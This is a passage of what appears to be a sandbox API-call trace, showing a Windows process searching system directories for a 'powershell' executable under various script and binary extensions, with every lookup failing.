	[0427.607] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.VBE", lpFindFileData=0x1c88dea0 | out: lpFindFileData=0x1c88dea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0427.615] SetErrorMode (uMode=0x1) returned 0x1
	[0427.616] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c88dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0427.616] SetErrorMode (uMode=0x1) returned 0x1
	[0427.617] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.JS", lpFindFileData=0x1c88dea0 | out: lpFindFileData=0x1c88dea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0427.624] SetErrorMode (uMode=0x1) returned 0x1
	[0427.626] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c88dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0427.626] SetErrorMode (uMode=0x1) returned 0x1
	[0427.626] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.JSE", lpFindFileData=0x1c88dea0 | out: lpFindFileData=0x1c88dea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0427.946] SetErrorMode (uMode=0x1) returned 0x1
	[0427.947] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c88dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0427.947] SetErrorMode (uMode=0x1) returned 0x1
	[0427.947] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.WSF", lpFindFileData=0x1c88dea0 | out: lpFindFileData=0x1c88dea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0427.955] SetErrorMode (uMode=0x1) returned 0x1
	[0427.957] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c88dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0427.957] SetErrorMode (uMode=0x1) returned 0x1
	[0427.957] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.WSH", lpFindFileData=0x1c88dea0 | out: lpFindFileData=0x1c88dea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0427.965] SetErrorMode (uMode=0x1) returned 0x1
	[0427.966] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c88dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0427.967] SetErrorMode (uMode=0x1) returned 0x1
	[0427.967] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.MSC", lpFindFileData=0x1c88dea0 | out: lpFindFileData=0x1c88dea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0427.975] SetErrorMode (uMode=0x1) returned 0x1
	[0427.976] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c88dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0427.976] SetErrorMode (uMode=0x1) returned 0x1
	[0427.976] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell", lpFindFileData=0x1c88dea0 | out: lpFindFileData=0x1c88dea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0427.984] SetErrorMode (uMode=0x1) returned 0x1
	[0427.986] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c88dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0427.986] SetErrorMode (uMode=0x1) returned 0x1
	[0427.986] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.ps1", lpFindFileData=0x1c88dea0 | out: lpFindFileData=0x1c88dea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0427.986] SetErrorMode (uMode=0x1) returned 0x1
	[0427.987] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c88dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0427.987] SetErrorMode (uMode=0x1) returned 0x1
	[0427.987] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.psm1", lpFindFileData=0x1c88dea0 | out: lpFindFileData=0x1c88dea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0427.987] SetErrorMode (uMode=0x1) returned 0x1
	[0427.987] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c88dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0427.988] SetErrorMode (uMode=0x1) returned 0x1
	[0427.988] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.psd1", lpFindFileData=0x1c88dea0 | out: lpFindFileData=0x1c88dea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0427.988] SetErrorMode (uMode=0x1) returned 0x1
	[0427.988] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c88dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0427.988] SetErrorMode (uMode=0x1) returned 0x1
	[0427.988] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.COM", lpFindFileData=0x1c88dea0 | out: lpFindFileData=0x1c88dea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0427.988] SetErrorMode (uMode=0x1) returned 0x1
	[0427.989] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c88dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0427.989] SetErrorMode (uMode=0x1) returned 0x1
	[0428.221] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.EXE", lpFindFileData=0x1c88dea0 | out: lpFindFileData=0x1c88dea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.222] SetErrorMode (uMode=0x1) returned 0x1
	[0428.222] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c88dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0428.222] SetErrorMode (uMode=0x1) returned 0x1
	[0428.222] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.BAT", lpFindFileData=0x1c88dea0 | out: lpFindFileData=0x1c88dea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.223] SetErrorMode (uMode=0x1) returned 0x1
	[0428.223] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c88dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0428.223] SetErrorMode (uMode=0x1) returned 0x1
	[0428.223] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.CMD", lpFindFileData=0x1c88dea0 | out: lpFindFileData=0x1c88dea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.223] SetErrorMode (uMode=0x1) returned 0x1
	[0428.223] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c88dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0428.224] SetErrorMode (uMode=0x1) returned 0x1
	[0428.224] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.VBS", lpFindFileData=0x1c88dea0 | out: lpFindFileData=0x1c88dea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.224] SetErrorMode (uMode=0x1) returned 0x1
	[0428.224] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c88dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0428.224] SetErrorMode (uMode=0x1) returned 0x1
	[0428.224] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.VBE", lpFindFileData=0x1c88dea0 | out: lpFindFileData=0x1c88dea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.225] SetErrorMode (uMode=0x1) returned 0x1
	[0428.225] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c88dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0428.225] SetErrorMode (uMode=0x1) returned 0x1
	[0428.225] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.JS", lpFindFileData=0x1c88dea0 | out: lpFindFileData=0x1c88dea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.225] SetErrorMode (uMode=0x1) returned 0x1
	[0428.225] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c88dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0428.226] SetErrorMode (uMode=0x1) returned 0x1
	[0428.226] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.JSE", lpFindFileData=0x1c88dea0 | out: lpFindFileData=0x1c88dea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.226] SetErrorMode (uMode=0x1) returned 0x1
	[0428.226] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c88dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0428.226] SetErrorMode (uMode=0x1) returned 0x1
	[0428.226] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.WSF", lpFindFileData=0x1c88dea0 | out: lpFindFileData=0x1c88dea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.227] SetErrorMode (uMode=0x1) returned 0x1
	[0428.227] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c88dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0428.227] SetErrorMode (uMode=0x1) returned 0x1
	[0428.227] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.WSH", lpFindFileData=0x1c88dea0 | out: lpFindFileData=0x1c88dea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.227] SetErrorMode (uMode=0x1) returned 0x1
	[0428.227] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c88dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0428.228] SetErrorMode (uMode=0x1) returned 0x1
	[0428.228] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.MSC", lpFindFileData=0x1c88dea0 | out: lpFindFileData=0x1c88dea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.228] SetErrorMode (uMode=0x1) returned 0x1
	[0428.228] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c88dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0428.228] SetErrorMode (uMode=0x1) returned 0x1
	[0428.228] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell", lpFindFileData=0x1c88dea0 | out: lpFindFileData=0x1c88dea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.228] SetErrorMode (uMode=0x1) returned 0x1
	[0428.229] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c88dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0428.229] SetErrorMode (uMode=0x1) returned 0x1
	[0428.229] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.ps1", lpFindFileData=0x1c88dea0 | out: lpFindFileData=0x1c88dea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.229] SetErrorMode (uMode=0x1) returned 0x1
	[0428.229] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c88dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0428.229] SetErrorMode (uMode=0x1) returned 0x1
	[0428.230] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.psm1", lpFindFileData=0x1c88dea0 | out: lpFindFileData=0x1c88dea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.230] SetErrorMode (uMode=0x1) returned 0x1
	[0428.230] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c88dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0428.230] SetErrorMode (uMode=0x1) returned 0x1
	[0428.230] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.psd1", lpFindFileData=0x1c88dea0 | out: lpFindFileData=0x1c88dea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.230] SetErrorMode (uMode=0x1) returned 0x1
	[0428.231] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c88dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0428.231] SetErrorMode (uMode=0x1) returned 0x1
	[0428.231] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.COM", lpFindFileData=0x1c88dea0 | out: lpFindFileData=0x1c88dea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.231] SetErrorMode (uMode=0x1) returned 0x1
	[0428.231] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c88dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0428.231] SetErrorMode (uMode=0x1) returned 0x1
	[0428.231] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.EXE", lpFindFileData=0x1c88dea0 | out: lpFindFileData=0x1c88dea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.232] SetErrorMode (uMode=0x1) returned 0x1
	[0428.232] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c88dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0428.232] SetErrorMode (uMode=0x1) returned 0x1
	[0428.232] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.BAT", lpFindFileData=0x1c88dea0 | out: lpFindFileData=0x1c88dea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.232] SetErrorMode (uMode=0x1) returned 0x1
	[0428.232] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c88dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0428.233] SetErrorMode (uMode=0x1) returned 0x1
	[0428.233] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.CMD", lpFindFileData=0x1c88dea0 | out: lpFindFileData=0x1c88dea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.233] SetErrorMode (uMode=0x1) returned 0x1
	[0428.233] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c88dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0428.233] SetErrorMode (uMode=0x1) returned 0x1
	[0428.233] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.VBS", lpFindFileData=0x1c88dea0 | out: lpFindFileData=0x1c88dea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.233] SetErrorMode (uMode=0x1) returned 0x1
	[0428.234] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c88dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0428.234] SetErrorMode (uMode=0x1) returned 0x1
